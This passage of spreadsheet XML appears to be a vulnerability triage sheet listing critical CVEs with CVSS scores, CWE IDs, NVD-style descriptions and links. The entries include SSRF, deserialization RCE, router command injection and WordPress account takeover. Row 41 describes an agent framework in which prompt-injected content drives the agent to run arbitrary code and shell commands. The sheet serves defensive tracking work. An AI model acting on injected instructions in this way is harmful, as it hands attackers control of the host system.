        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Power Automate allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65818</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78234</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. The operator reads the OpenShift Service CA private signing key from the openshift-service-ca namespace and uses it to mint client certificates with a Subject Common Name (CN) supplied by the author of a namespaced Hawtio custom resource. Because the operator ships a ClusterRole that aggregates Hawtio CR permissions into the edit and admin roles, any user with edit access in any namespace can obtain a Service-CA-signed certificate with an arbitrary subject. This certificate can be used to impersonate any in-cluster service identity to peers that trust the Service CA for client authentication, including Jolokia agents and other Service-CA-trusting components.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79748</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R27"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S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79748</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql, keycloak</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="R28"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S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-42179</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>Bird Home Automation GmbH D1101V-F 000140 is vulnerable to Incorrect Access Control via the Key derivation process, password validation process.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-42179</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-11080</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>The Post Grid and Gutenberg Blocks – ComboBlocks plugin for WordPress is vulnerable to Unauthenticated Hook Injection in versions 2.2.32 to 2.3.1 via several functions in the ~/includes/blocks/form-wrap/function.php file. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress, granted no other security controls are present in the function.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-11080</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10196</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>The Mail Mint – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.31.0 via deserialization of untrusted input in the 'handle_form_submission' function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code on the server. The vulnerability was partially patched in version 1.23.1.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10196</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12744</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12745</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13447</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R34"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S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13447</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16310</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>The MemberDash plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.8.5 via the 'id' parameter due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to change the password of any WordPress user, including administrators, by supplying an arbitrary user ID during registration, and take over their account without any notification sent to the victim.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16310</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18221</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to gain unauthorized access due to improper validation of client-supplied authentication parameters.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18221</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28606</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R37"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S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31020</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>In DocsGPT 0.15.0 and below, the application provides a custom prompt feature that allows users to define prompt content used during chatbot interactions. This functionality renders user-supplied prompt data using Jinja templates without input sanitization or sandboxing. An unauthenticated attacker can inject malicious template expressions, leading to a server-side template injection (SSTI) vulnerability that can be exploited to achieve full remote code execution (RCE).</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31020</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35868</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>A Command Injection vulnerability exists in the bs_SetLimitCli_info function within the libshare.so library of LB-link Router AC2100_AZ3 V1.0.4.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S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35868</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35869</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>A Command Injection vulnerability exists in the bs_SetLimitCli_info function within the libshare.so library of LB-link Router AC450M V4.0.0. This flaw occurs due to insufficient validation and sanitization of user-supplied input before it is passed to a system-level command execution context. An attacker can exploit this vulnerability by injecting specially crafted shell metacharacters or payloads into the vulnerable parameter, resulting in the execution of arbitrary operating system commands.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35869</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37003</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>Agno up to and including 2.5.8 is vulnerable to Remote Code Execution (RCE) via prompt injection. The PythonTools and ShellTools components pass unsanitized, LLM-generated arguments directly to execution sinks including exec(), runpy.run_path(), and subprocess.run(). An unauthenticated attacker can exploit this by embedding malicious instructions in content processed by the agent (such as web pages or documents), allowing for arbitrary code and OS command execution on the host server.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37003</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37236</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>grpc-gatew</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37236</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49921</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
